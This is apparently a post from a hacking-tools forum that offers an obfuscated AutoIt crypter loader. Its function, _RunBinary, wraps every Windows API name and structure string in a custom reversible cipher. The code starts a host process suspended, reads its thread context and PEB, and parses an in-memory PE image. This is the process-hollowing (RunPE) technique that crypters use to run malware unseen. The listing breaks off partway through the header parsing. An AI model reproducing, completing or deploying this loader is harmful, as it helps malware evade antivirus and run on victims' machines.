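It uses a custom method, "ShiftOneLove", which applies a randomly generated character shift to each string, plus the classic "StringReverse".
In the listing below every string literal appears as ShiftOneLove(Revers('...'), n): the quoted text looks like a reversed, pipe-separated list of decimal character codes and n is that string's shift. This is reversible string obfuscation rather than encryption, and the wrapper pattern itself remains visible in the script as a static marker.
String Reverse -> ShiftOneLove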
String Reverse -> ShiftOneLove
Code:
>;Encrypted by DDoSer
;level23hacktools.com
Func _RunBinary($P30, $F31 = "", $F32 = @AutoItExe)
;#region 1. DETERMINE INTERPRETER TYPE
Local $G33 = @AutoItX64
;#region 2. PREDPROCESSING PASSED
Local $T34 = Binary($P30) ; this is redundant but still...
; Make structure out of binary data that was passed
Local $N36 = DllStructCreate(ShiftOneLove(Revers('49|401|911|421|101'), 3) & BinaryLen($T34) & ShiftOneLove(Revers('69'), 3))
DllStructSetData($N36, 1, $T34) ; fill it
; Get pointer to it
Local $R3130 = DllStructGetPtr($N36)
;#region 3. CREATING NEW PROCESS
; STARTUPINFO structure (actually all that really matters is allocated space)
Local $T3132 = DllStructCreate(ShiftOneLove(Revers('76|901|031|311|19|601|701|04|801|221|911|721|801'), 8) & _
ShiftOneLove(Revers('76|801|901|621|221|901|321|901|09|04|221|421|021'), 8) & _
ShiftOneLove(Revers('16|411|311|811|901|711|301|07|43|611|811|411'), 2) & _
ShiftOneLove(Revers('16|301|011|811|701|68|43|611|811|411'), 2) & _
ShiftOneLove(Revers('66|59|93|701|121|811|621|701'), 7) & _
ShiftOneLove(Revers('46|49|73|501|911|611|421|501'), 5) & _
ShiftOneLove(Revers('76|901|031|311|19|69|04|801|221|911|721|801'), 8) & _
ShiftOneLove(Revers('56|701|821|111|98|59|83|601|021|711|521|601'), 6) & _
ShiftOneLove(Revers('36|911|811|101|801|17|021|411|121|511|17|29|63|401|811|511|321|401'), 4) & _
ShiftOneLove(Revers('66|221|121|401|111|47|321|711|421|811|47|69|93|701|121|811|621|701'), 7) & _
ShiftOneLove(Revers('16|301|811|911|001|701|611|811|811|76|011|011|701|27|43|201|611|311|121|201'), 2) & _
ShiftOneLove(Revers('46|021|801|201|311|57|73|501|911|611|421|501'), 5) & _
ShiftOneLove(Revers('16|121|311|201|211|701|98|121|311|601|58|43|201|611|311|121'), 2) & _
ShiftOneLove(Revers('76|85|801|901|621|221|901|321|901|09|04|801|221|911|721'), 8) & _
ShiftOneLove(Revers('26|35|301|401|121|711|401|811|401|58|53|711|911|511'), 3) & _
ShiftOneLove(Revers('66|321|421|911|711|08|701|321|09|111|93|121|321|911'), 7) & _
ShiftOneLove(Revers('76|421|521|021|421|521|78|801|421|19|211|04|221|421|021'), 8) & _
ShiftOneLove(Revers('611|311|611|611|17|201|811|58|601|43|611|811|411'), 2))
; This is much important. This structure will hold very some important data.
Local $P3133 = DllStructCreate(ShiftOneLove(Revers('06|611|611|201|001|211|511|18|33|511|711|311'), 1) & _
ShiftOneLove(Revers('96|011|701|111|421|411|49|24|421|621|221'), 10) & _
ShiftOneLove(Revers('66|701|08|221|221|801|601|811|121|78|93|701|121|811|621|701'), 7) & _
ShiftOneLove(Revers('401|77|401|101|501|811|801|88|63|401|811|511|321|401'), 4))
; Create new process
Local $J3134 = DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('19|911|911|501|301|511|811|48|501|021|101|501|811|17'), 4), _
ShiftOneLove(Revers('221|421|321|721'), 8), $F32, _
ShiftOneLove(Revers('221|421|321|721'), 8), $F31, _
ShiftOneLove(Revers('711|911|511'), 3), 0, _
ShiftOneLove(Revers('711|911|511'), 3), 0, _
ShiftOneLove(Revers('221|611|111'), 6), 0, _
ShiftOneLove(Revers('801|221|911|721|801'), 8), 4, _ ; CREATE_SUSPENDED ; <- this is essential
ShiftOneLove(Revers('711|911|511'), 3), 0, _
ShiftOneLove(Revers('711|911|511'), 3), 0, _
ShiftOneLove(Revers('711|911|511'), 3), DllStructGetPtr($T3132), _
ShiftOneLove(Revers('711|911|511'), 3), DllStructGetPtr($P3133))
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $J3134[0] Then Return SetError(1, 0, 0) ; CreateProcess function or call to it failed
; Get new process and thread handles:
Local $N3230 = DllStructGetData($P3133, ShiftOneLove(Revers('911|911|501|301|511|811|48'), 4))
Local $O3232 = DllStructGetData($P3133, ShiftOneLove(Revers('201|99|301|611|601|68'), 2))
; Check for 'wrong' bit-ness. Not because it could't be implemented, but besause it would be uglyer (structures)
If $G33 And _RunBinary_IsWow64Process($N3230) Then
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(2, 0, 0)
EndIf
;#region 4. FILL CONTEXT STRUCTURE
; CONTEXT structure is what's really important here. It's processor specific.
Local $R3237, $A3238
If $G33 Then
If @OSArch = ShiftOneLove(Revers('26|46|89'), 10) Then
$R3237 = 2
$A3238 = DllStructCreate(ShiftOneLove(Revers('06|201|011|211|37|55|18|33|35|55|711|111|601|811|33|06|201|011|211|37|45|18|33|35|55|711|111|601|811|33|06|201|011|211|37|35|18|33|35|55|711|111|601|811|33|06|201|011|211|37|25|18|33|35|55|711|111|601|811|33|06|201|011|211|37|15|18|33|35|55|711|111|601|811|33|06|201|011|211|37|05|18|33|35|55|711|111|601|811|33|06|55|05|33|111|401|601|901|89'), 1) & _ ; Register parameter home addresses
ShiftOneLove(Revers('46|911|021|27|521|28|73|501|911|611|421|501|73|46|021|801|201|311|57|121|521|601|121|511|611|27|73|501|911|611|421|501'), 5) & _ ; Control flags
ShiftOneLove(Revers('46|021|801|201|311|57|47|73|501|911|611|421|501|73|46|021|88|801|601|88|73|501|911|611|421|73|46|021|67|801|601|88|73|501|911|611|421|73|46|021|57|801|601|88|73|501|911|611|421|73|46|021|47|801|601|88|73|501|911|611|421|73|46|021|37|801|601|88|73|501|911|611|421|73|46|88|27|801|601|88|73|501|911|611|421'), 5) & _ ; Segment Registers and processor flags
ShiftOneLove(Revers('16|75|611|07|43|45|65|811|211|701|911|43|16|65|611|07|43|45|65|811|211|701|911|43|16|35|611|07|43|45|65|811|211|701|911|43|16|25|611|07|43|45|65|811|211|701|911|43|16|15|611|07|43|45|65|811|211|701|911|43|16|05|611|07|43|45|65|811|211|701|911'), 2) & _ ; Debug registers
ShiftOneLove(Revers('86|26|85|19|14|16|36|521|911|411|621|14|86|16|85|19|14|16|36|521|911|411|621|14|86|06|85|19|14|16|36|521|911|411|621|14|86|95|85|19|14|16|36|521|911|411|621|14|86|85|85|19|14|16|36|521|911|411|621|14|86|75|85|19|14|16|36|521|911|411|621|14|86|66|19|14|16|36|521|911|411|621|14|86|56|19|14|16|36|521|911|411|621|14|86|411|901|19|14|16|36|521|911|411|621|14|86|411|421|19|14|16|36|521|911|411|621|14|86|121|701|19|14|16|36|521|911|411|621|14|86|121|421|19|14|16|36|521|911|411|621|14|86|921|701|19|14|16|36|521|911|411|621|14|86|921|901|19|14|16|36|521|911|411|621|14|86|921|801|19|14|16|36|521|911|411|621|14|86|921|601|19|14|16|36|521|911|411|621'), 9) & _ ; Integer registers
ShiftOneLove(Revers('36|611|901|68|63|65|85|021|411|901|121'), 4) & _ ; Program counter
ShiftOneLove(Revers('06|49|15|29|45|05|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|35|05|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|25|05|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|15|05|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|05|05|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|94|05|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|85|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|75|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|65|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|55|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|45|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|35|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|25|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|15|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|05|011|011|98|33|35|55|711|111|601|811|33|06|49|15|29|94|011|011|98|33|35|55|711|111|601|811|33|06|49|55|05|29|221|001|89|401|201|77|33|35|55|711|111|601|811|33|06|49|35|29|511|201|101|89|201|37|33|35|55|711|111|601|811'), 1) & _ ; Floating point state (types are not correct for simplicity reasons!!!)
ShiftOneLove(Revers('36|211|511|811|021|411|511|17|811|511|021|301|501|09|63|65|85|021|411|901|121|63|36|79|45|75|59|811|501|021|911|901|701|501|68|811|511|021|301|501|09|63|65|85|021|411|901|121'), 4) & _ ; Vector registers (type for VectorRegister is not correct for simplicity reasons!!!)
ShiftOneLove(Revers('411|701|48|111|311|611|27|211|311|701|811|411|301|101|221|17|811|711|99|87|43|45|65|811|211|701|911|43|16|411|701|48|311|68|211|311|701|811|411|301|101|221|17|811|711|99|87|43|45|65|811|211|701|911|43|16|411|701|48|111|311|611|27|601|101|211|99|611|86|811|711|99|87|43|45|65|811|211|701|911|43|16|411|701|48|311|68|601|101|211|99|611|86|811|711|99|87|43|45|65|811|211|701|911|43|16|011|311|611|811|211|311|96|501|911|001|301|07|43|45|65|811|211|701|911'), 2)) ; Special debug control registers
Else
$R3237 = 3
; FIXME - Itanium architecture
; Return special error number:
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(102, 0, 0)
EndIf
Else
$R3237 = 1
$A3238 = DllStructCreate(ShiftOneLove(Revers('26|811|601|001|111|37|911|321|401|911|311|411|07|53|301|711|411|221|301'), 3) & _ ; Control flags
ShiftOneLove(Revers('16|75|611|07|43|201|611|311|121|201|43|16|65|611|07|43|201|611|311|121|201|43|16|35|611|07|43|201|611|311|121|201|43|16|25|611|07|43|201|611|311|121|201|43|16|15|611|07|43|201|611|311|121|201|43|16|05|611|07|43|201|611|311|121|201'), 2) & _ ; CONTEXT_DEBUG_REGISTERS
ShiftOneLove(Revers('06|201|711|89|711|48|121|311|97|94|511|86|33|101|511|211|021|101|33|06|49|94|75|29|89|201|511|66|511|201|711|611|601|401|201|38|33|201|711|221|99|33|06|511|211|711|001|201|901|201|48|89|711|89|96|33|101|511|211|021|101|33|06|711|201|611|301|301|08|89|711|89|96|33|101|511|211|021|101|33|06|511|211|711|001|201|901|201|48|511|211|511|511|07|33|101|511|211|021|101|33|06|711|201|611|301|301|08|511|211|511|511|07|33|101|511|211|021|101|33|06|101|511|211|88|401|89|58|33|101|511|211|021|101|33|06|101|511|211|88|611|811|711|89|711|48|33|101|511|211|021|101|33|06|101|511|211|88|901|211|511|711|111|211|86|33|101|511|211|021|101'), 1) & _ ; CONTEXT_FLOATING_POINT
ShiftOneLove(Revers('46|021|37|801|601|88|73|501|911|611|421|501|73|46|021|47|801|601|88|73|501|911|611|421|501|73|46|021|57|801|601|88|73|501|911|611|421|501|73|46|021|67|801|601|88|73|501|911|611|421|501'), 5) & _ ; CONTEXT_SEGMENTS
ShiftOneLove(Revers('66|721|401|67|93|701|121|811|621|701|93|66|721|601|67|93|701|121|811|621|701|93|66|721|701|67|93|701|121|811|621|701|93|66|721|501|67|93|701|121|811|621|701|93|66|211|221|67|93|701|121|811|621|701|93|66|211|701|67|93|701|121|811|621|701'), 7) & _ ; CONTEXT_INTEGER
ShiftOneLove(Revers('86|421|29|211|011|29|14|901|321|021|821|901|14|86|121|421|87|14|901|321|021|821|901|14|86|421|211|601|711|97|87|14|901|321|021|821|901|14|86|421|67|211|011|29|14|901|321|021|821|901|14|86|121|411|87|14|901|321|021|821|901|14|86|121|701|87|14|901|321|021|821|901'), 9) & _ ; CONTEXT_CONTROL
ShiftOneLove(Revers('99|65|55|95|79|121|021|701|221|121|111|901|701|88|601|701|601|611|701|221|621|57|83|701|221|721|401'), 6)) ; CONTEXT_EXTENDED_REGISTERS
EndIf
; Define CONTEXT_FULL
Local $N3336
Switch $R3237
Case 1
$N3336 = 0x10007
Case 2
$N3336 = 0x100007
Case 3
$N3336 = 0x80027
EndSwitch
; Set desired access
DllStructSetData($A3238, ShiftOneLove(Revers('421|211|601|711|97|521|921|011|521|911|021|67'), 9), $N3336)
; Fill CONTEXT structure:
$J3134 = DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|721|801|321|711|811|47|701|401|801|121|111|19|321|801|87'), 7), _
ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $O3232, _
ShiftOneLove(Revers('711|911|511'), 3), DllStructGetPtr($A3238))
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $J3134[0] Then
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(3, 0, 0) ; GetThreadContext function or call to it failed
EndIf
; Pointer to PEB structure
Local $W3438
Switch $R3237
Case 1
$W3438 = DllStructGetData($A3238, ShiftOneLove(Revers('421|201|37'), 4))
Case 2
$W3438 = DllStructGetData($A3238, ShiftOneLove(Revers('121|101|38'), 1))
Case 3
; FIXME - Itanium architecture
EndSwitch
;#region 5. READ PE-FORMAT
; Start processing passed binary data. 'Reading' PE format follows.
; First is IMAGE_DOS_HEADER
Local $R3534 = DllStructCreate(ShiftOneLove(Revers('06|49|15|29|001|601|401|89|87|33|511|89|501|001'), 1) & _
ShiftOneLove(Revers('76|901|111|501|88|421|321|501|48|811|78|321|901|421|921|47|04|801|221|911|721'), 8) & _
ShiftOneLove(Revers('06|611|201|401|89|18|33|101|511|211|021'), 1) & _
ShiftOneLove(Revers('56|121|611|711|111|221|301|501|711|411|701|88|83|601|021|711|521'), 6) & _
ShiftOneLove(Revers('86|321|011|901|601|011|18|111|021|011|131|411|29|14|901|321|021|821'), 9) & _
ShiftOneLove(Revers('56|301|021|221|621|57|511|321|511|111|611|111|38|83|601|021|711|521'), 6) & _
ShiftOneLove(Revers('46|201|911|121|521|47|411|221|411|011|521|201|28|73|501|911|611|421'), 5) & _
ShiftOneLove(Revers('66|09|09|93|701|121|811|621'), 7) & _
ShiftOneLove(Revers('46|58|88|73|501|911|611|421'), 5) & _
ShiftOneLove(Revers('76|711|521|321|511|701|901|211|57|04|801|221|911|721'), 8) & _
ShiftOneLove(Revers('46|58|87|73|501|911|611|421'), 5) & _
ShiftOneLove(Revers('96|39|77|24|011|421|121|921'), 10) & _
ShiftOneLove(Revers('86|911|021|411|521|601|801|021|711|011|19|14|901|321|021|821'), 9) & _
ShiftOneLove(Revers('06|221|89|901|511|201|911|08|33|101|511|211|021'), 1) & _
ShiftOneLove(Revers('96|301|66|101|011|111|821|421|111|521|111|29|24|421|701|411|901'), 10) & _
ShiftOneLove(Revers('56|021|701|111|801|111|221|611|701|601|97|38|57|58|83|601|021|711|521'), 6) & _
ShiftOneLove(Revers('76|811|911|311|421|501|711|221|911|011|811|18|58|77|78|04|801|221|911|721'), 8) & _
ShiftOneLove(Revers('56|99|45|65|79|65|601|701|421|021|701|121|701|88|83|021|301|011|501'), 6) & _
ShiftOneLove(Revers('811|501|401|101|501|67|501|421|37|321|501|28|601|38|911|911|501|811|401|401|96|63|401|811|511|321|401'), 4), _
$R3130)
; Save this pointer value (it's starting address of binary image headers)
Local $N3536 = $R3130
; Move pointer
$R3130 += DllStructGetData($R3534, ShiftOneLove(Revers('611|301|201|99|301|47|301|221|17|121|301|08|401|18|711|711|301|611|201|201|76'), 2)) ; move to PE file header
; Get ShiftOneLove(Revers('901|511|311|701|78'), 10)
Local $P3630 = DllStructGetData($R3534, ShiftOneLove(Revers('901|511|311|701|78'), 10))
; Check if it's valid format
If Not ($P3630 == ShiftOneLove(Revers('99|68'), 9)) Then
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(4, 0, 0) ; MS-DOS header missing.
EndIf
; In place of IMAGE_NT_SIGNATURE
Local $S3634 = DllStructCreate(ShiftOneLove(Revers('801|121|421|321|401|711|011|211|09|93|701|121|811|621|701'), 7), $R3130)
; Move pointer
$R3130 += 4 ; size of $S3634 structure
; Check signature
If DllStructGetData($S3634, ShiftOneLove(Revers('901|221|521|421|501|811|111|311|19'), 8)) <> 17744 Then ; IMAGE_NT_SIGNATURE
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(5, 0, 0) ; wrong signature. For PE image should be ShiftOneLove(Revers('94|39|94|39|07|18'), 1) or 17744 dword.
EndIf
; In place of IMAGE_FILE_HEADER
Local $F3730 = DllStructCreate(ShiftOneLove(Revers('66|801|711|211|111|601|401|48|93|701|121|811|621'), 7) & _
ShiftOneLove(Revers('26|811|311|411|801|911|201|401|68|501|28|711|401|101|211|021|18|53|301|711|411|221'), 3) & _
ShiftOneLove(Revers('16|411|111|99|811|58|301|811|99|07|301|111|701|68|43|201|611|311|121|201'), 2) & _
ShiftOneLove(Revers('46|601|311|301|201|98|311|611|301|411|621|88|611|98|911|601|121|511|011|611|58|73|501|911|611|421|501'), 5) & _
ShiftOneLove(Revers('06|611|901|211|99|011|221|48|301|08|511|201|99|011|811|97|33|101|511|211|021|101'), 1) & _
ShiftOneLove(Revers('96|421|111|011|701|111|28|811|701|021|121|511|621|221|98|211|98|111|231|511|39|24|011|421|121|921'), 10) & _
ShiftOneLove(Revers('521|901|511|621|521|511|421|111|621|901|701|421|701|411|77|24|011|421|121|921'), 10), _
$R3130)
; I could check here if the module is relocatable
; Local $S3734
; If BitAND(DllStructGetData($F3730, ShiftOneLove(Revers('321|701|311|421|321|311|221|901|421|701|501|221|501|211|57'), 8)), 1) Then $S3734 = False
; But I won't (will check data in IMAGE_DIRECTORY_ENTRY_BASERELOC instead)
; Get number of sections
Local $N3735 = DllStructGetData($F3730, ShiftOneLove(Revers('121|611|711|111|221|501|701|98|801|58|021|701|401|511|321|48'), 6))
; Move pointer
$R3130 += 20 ; size of $F3730 structure
; In place of IMAGE_OPTIONAL_HEADER
Local $W3739 = DllStructCreate(ShiftOneLove(Revers('86|801|411|211|601|68|14|901|321|021|821'), 9), $R3130)
Local $X3831 = DllStructGetData($W3739, 1)
Local $C3833
If $X3831 = 267 Then ; x86 version
If $G33 Then
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(6, 0, 0) ; incompatible versions
EndIf
$C3833 = DllStructCreate(ShiftOneLove(Revers('86|801|411|211|601|68|14|901|321|021|821'), 9) & _
ShiftOneLove(Revers('76|811|911|311|321|221|901|49|221|901|511|811|311|48|221|911|411|501|58|04|901|421|921|601'), 8) & _
ShiftOneLove(Revers('16|211|311|701|711|611|301|88|611|301|901|211|701|87|611|311|211|701|97|43|301|811|321|001'), 2) & _
ShiftOneLove(Revers('36|501|401|511|17|601|38|501|621|901|78|63|401|811|511|321|401'), 4) & _
ShiftOneLove(Revers('36|101|021|101|27|401|501|621|901|211|101|901|021|901|411|77|601|38|501|621|901|78|63|401|811|511|321|401'), 4) & _
ShiftOneLove(Revers('96|701|621|701|87|011|111|231|511|811|701|511|621|511|021|511|021|59|211|98|111|231|511|39|24|011|421|121|921|011'), 10) & _
ShiftOneLove(Revers('16|811|211|701|311|28|321|611|811|211|17|401|18|711|711|301|611|201|201|76|43|201|611|311|121|201'), 2) & _
ShiftOneLove(Revers('76|901|801|911|57|011|78|901|321|501|47|04|801|221|911|721|801'), 8) & _
ShiftOneLove(Revers('56|301|221|301|47|801|58|701|121|301|27|83|601|021|711|521|601'), 6) & _
ShiftOneLove(Revers('76|901|321|501|47|901|111|501|711|18|04|801|221|911|721|801'), 8) & _
ShiftOneLove(Revers('06|711|111|201|011|111|401|601|901|66|111|211|601|711|001|201|48|33|101|511|211|021|101'), 1) & _
ShiftOneLove(Revers('26|911|311|401|211|311|601|801|111|86|401|111|801|37|53|301|711|411|221|301'), 3) & _
ShiftOneLove(Revers('86|911|021|411|421|321|011|59|811|011|521|421|031|29|211|911|411|521|601|321|011|121|88|321|021|511|601|68|14|901|321|021|821'), 9) & _
ShiftOneLove(Revers('36|411|511|901|911|811|501|09|311|501|021|911|521|78|701|411|901|021|101|811|501|611|38|811|511|411|901|18|63|401|811|511|321'), 4) & _
ShiftOneLove(Revers('36|411|511|901|911|811|501|09|501|701|101|311|77|811|511|011|101|18|63|401|811|511|321'), 4) & _
ShiftOneLove(Revers('46|511|611|011|021|911|601|19|601|801|201|411|87|911|611|511|011|28|73|501|911|611|421'), 5) & _
ShiftOneLove(Revers('86|911|021|411|421|321|011|59|811|011|521|421|031|421|701|621|29|321|021|511|601|68|14|901|321|021|821'), 9) & _
ShiftOneLove(Revers('56|611|711|111|121|021|701|29|511|701|221|121|721|121|401|321|98|021|711|611|111|38|83|601|021|711|521'), 6) & _
ShiftOneLove(Revers('86|011|621|711|601|59|911|021|411|421|321|011|59|95|06|911|411|69|14|901|321|021|821|901'), 9) & _
ShiftOneLove(Revers('66|801|011|401|611|08|901|68|801|921|211|09|93|701|121|811|621|701'), 7) & _
ShiftOneLove(Revers('06|611|511|201|101|89|201|37|301|08|201|321|601|48|33|101|511|211|021|101'), 1) & _
ShiftOneLove(Revers('36|311|121|78|111|301|501|801|17|63|401|811|511|321|401'), 4) & _
ShiftOneLove(Revers('66|611|801|321|221|821|221|501|421|09|93|701|121|811|621'), 7) & _
ShiftOneLove(Revers('86|421|801|411|521|421|411|321|011|521|801|601|321|601|311|67|711|711|77|14|901|321|021|821'), 9) & _
ShiftOneLove(Revers('86|011|721|321|011|421|011|19|611|801|601|521|29|111|88|011|131|411|29|14|901|321|021|821|901'), 9) & _
ShiftOneLove(Revers('96|621|511|911|911|121|77|711|901|701|621|39|211|98|111|231|511|39|24|011|421|121|921|011'), 10) & _
ShiftOneLove(Revers('16|301|021|611|301|711|301|48|411|99|301|47|401|18|301|421|701|58|43|201|611|311|121|201'), 2) & _
ShiftOneLove(Revers('16|811|701|111|111|311|96|411|99|301|47|401|18|301|421|701|58|43|201|611|311|121|201'), 2) & _
ShiftOneLove(Revers('26|811|601|001|111|37|711|401|301|001|411|97|53|301|711|411|221|301'), 3) & _
ShiftOneLove(Revers('911|501|621|901|78|401|411|96|101|221|68|601|38|811|501|201|311|121|28|63|401|811|511|321|401'), 4), _
$R3130)
; Move pointer
$R3130 += 96 ; size of $C3833
ElseIf $X3831 = 523 Then ; x64 version
If Not $G33 Then
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(6, 0, 0) ; incompatible versions
EndIf
$C3833 = DllStructCreate(ShiftOneLove(Revers('86|801|411|211|601|68|14|901|321|021|821'), 9) & _
ShiftOneLove(Revers('76|811|911|311|321|221|901|49|221|901|511|811|311|48|221|911|411|501|58|04|901|421|921|601'), 8) & _
ShiftOneLove(Revers('16|211|311|701|711|611|301|88|611|301|901|211|701|87|611|311|211|701|97|43|301|811|321|001'), 2) & _
ShiftOneLove(Revers('36|501|401|511|17|601|38|501|621|901|78|63|401|811|511|321|401'), 4) & _
ShiftOneLove(Revers('36|101|021|101|27|401|501|621|901|211|101|901|021|901|411|77|601|38|501|621|901|78|63|401|811|511|321|401'), 4) & _
ShiftOneLove(Revers('96|701|621|701|87|011|111|231|511|811|701|511|621|511|021|511|021|59|211|98|111|231|511|39|24|011|421|121|921|011'), 10) & _
ShiftOneLove(Revers('16|811|211|701|311|28|321|611|811|211|17|401|18|711|711|301|611|201|201|76|43|201|611|311|121|201'), 2) & _
ShiftOneLove(Revers('76|901|801|911|57|011|78|901|321|501|47|04|801|221|911|721|801'), 8) & _
ShiftOneLove(Revers('26|401|811|001|96|401|601|001|211|67|53|55|75|911|311|801|021'), 3) & _
ShiftOneLove(Revers('06|711|111|201|011|111|401|601|901|66|111|211|601|711|001|201|48|33|101|511|211|021|101'), 1) & _
ShiftOneLove(Revers('26|911|311|401|211|311|601|801|111|86|401|111|801|37|53|301|711|411|221|301'), 3) & _
ShiftOneLove(Revers('86|911|021|411|421|321|011|59|811|011|521|421|031|29|211|911|411|521|601|321|011|121|88|321|021|511|601|68|14|901|321|021|821'), 9) & _
ShiftOneLove(Revers('36|411|511|901|911|811|501|09|311|501|021|911|521|78|701|411|901|021|101|811|501|611|38|811|511|411|901|18|63|401|811|511|321'), 4) & _
ShiftOneLove(Revers('36|411|511|901|911|811|501|09|501|701|101|311|77|811|511|011|101|18|63|401|811|511|321'), 4) & _
ShiftOneLove(Revers('46|511|611|011|021|911|601|19|601|801|201|411|87|911|611|511|011|28|73|501|911|611|421'), 5) & _
ShiftOneLove(Revers('86|911|021|411|421|321|011|59|811|011|521|421|031|421|701|621|29|321|021|511|601|68|14|901|321|021|821'), 9) & _
ShiftOneLove(Revers('56|611|711|111|121|021|701|29|511|701|221|121|721|121|401|321|98|021|711|611|111|38|83|601|021|711|521'), 6) & _
ShiftOneLove(Revers('86|011|621|711|601|59|911|021|411|421|321|011|59|95|06|911|411|69|14|901|321|021|821|901'), 9) & _
ShiftOneLove(Revers('66|801|011|401|611|08|901|68|801|921|211|09|93|701|121|811|621|701'), 7) & _
ShiftOneLove(Revers('06|611|511|201|101|89|201|37|301|08|201|321|601|48|33|101|511|211|021|101'), 1) & _
ShiftOneLove(Revers('36|311|121|78|111|301|501|801|17|63|401|811|511|321|401'), 4) & _
ShiftOneLove(Revers('66|611|801|321|221|821|221|501|421|09|93|701|121|811|621'), 7) & _
ShiftOneLove(Revers('86|421|801|411|521|421|411|321|011|521|801|601|321|601|311|67|711|711|77|14|901|321|021|821'), 9) & _
ShiftOneLove(Revers('36|501|221|811|501|911|501|68|111|301|101|021|78|601|38|501|621|901|78|63|65|85|021|411|901|121'), 4) & _
ShiftOneLove(Revers('46|121|011|411|411|611|27|211|401|201|121|88|701|48|601|721|011|88|73|75|95|121|511|011|221'), 5) & _
ShiftOneLove(Revers('66|801|521|121|801|221|801|98|911|401|801|97|901|68|801|921|211|09|93|95|16|321|711|211|421'), 7) & _
ShiftOneLove(Revers('06|711|601|011|011|211|86|311|89|201|37|301|08|201|321|601|48|33|35|55|711|111|601|811'), 1) & _
ShiftOneLove(Revers('26|811|601|001|111|37|711|401|301|001|411|97|53|301|711|411|221|301'), 3) & _
ShiftOneLove(Revers('911|501|621|901|78|401|411|96|101|221|68|601|38|811|501|201|311|121|28|63|401|811|511|321|401'), 4), _
$R3130)
; Move pointer
$R3130 += 112 ; size of $C3833
Else
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(6, 0, 0) ; incompatible versions
EndIf
; Extract entry point address
Local $L3939 = DllStructGetData($C3833, ShiftOneLove(Revers('811|211|701|311|28|321|611|811|211|17|401|18|711|711|301|611|201|201|76'), 2)) ; if loaded binary image would start executing at this address
; And other interesting informations
Local $S313031 = DllStructGetData($C3833, ShiftOneLove(Revers('911|811|501|401|101|501|67|601|38|501|621|901|78'), 4))
Local $M313033 = DllStructGetData($C3833, ShiftOneLove(Revers('601|021|201|17|601|801|201|411|87'), 5)) ; address of the first byte of the image when it's loaded in memory
Local $H313035 = DllStructGetData($C3833, ShiftOneLove(Revers('901|111|501|711|18|011|78|901|031|311|19'), 8)) ; the size of the image including all headers
; Move pointer
$R3130 += 8 ; skipping IMAGE_DIRECTORY_ENTRY_EXPORT
$R3130 += 8 ; size of $J313039
